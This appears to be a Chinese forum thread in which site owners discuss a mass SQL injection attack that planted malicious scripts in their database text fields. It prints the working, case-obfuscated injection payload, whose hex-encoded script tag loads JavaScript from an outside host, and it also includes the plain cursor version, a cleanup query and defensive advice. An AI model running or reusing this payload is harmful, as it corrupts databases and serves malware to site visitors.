找到一段;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;--
找到一篇文章最近我的网站常被人挂马,我不知道为什么,我去掉了一段时间论坛,后来就没中了,仔细一分析,发现原来是数据库常被人挂马了.以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段) xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255), @C varchar(255) DECLARE Table_Cursor CURSOR FOR Select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [’+@T+’] set [’+@C+’]= rtrim(convert(varchar,[’+@C+’]))+ ”挂马内容”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
select 'update ' + b.[name] + ' set ' + a.[name] + '=replace(' + a.[name] + ',''</title></pre>"><script src=http://1.hao929.cn/ads.js></script><!--'','''')' from syscolumns as a,sysobjects as b where a.[id]=b.[id] and b.xtype='U' and a.xtype in ('231','35','99','167','175') order by b.[name]
xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select
a.name,b.name
from sysobjects a,
syscolumns b
where a.id=b.id and
a.xtype=’u’ and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=
rtrim(convert(varchar,[’+@C+’]))+
”挂马内容”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
from syscolumns as a,sysobjects as b where a.[id]=b.[id] and b.xtype='U'
and a.xtype in ('231','35','99','167','175') order by b.[name]
明明就是跨站攻击....................................................................
楼主记得传参用sqlparameter
还要过滤掉危险字符..象<script>之类的,想都不想就过滤了...或者给他替换成全角的.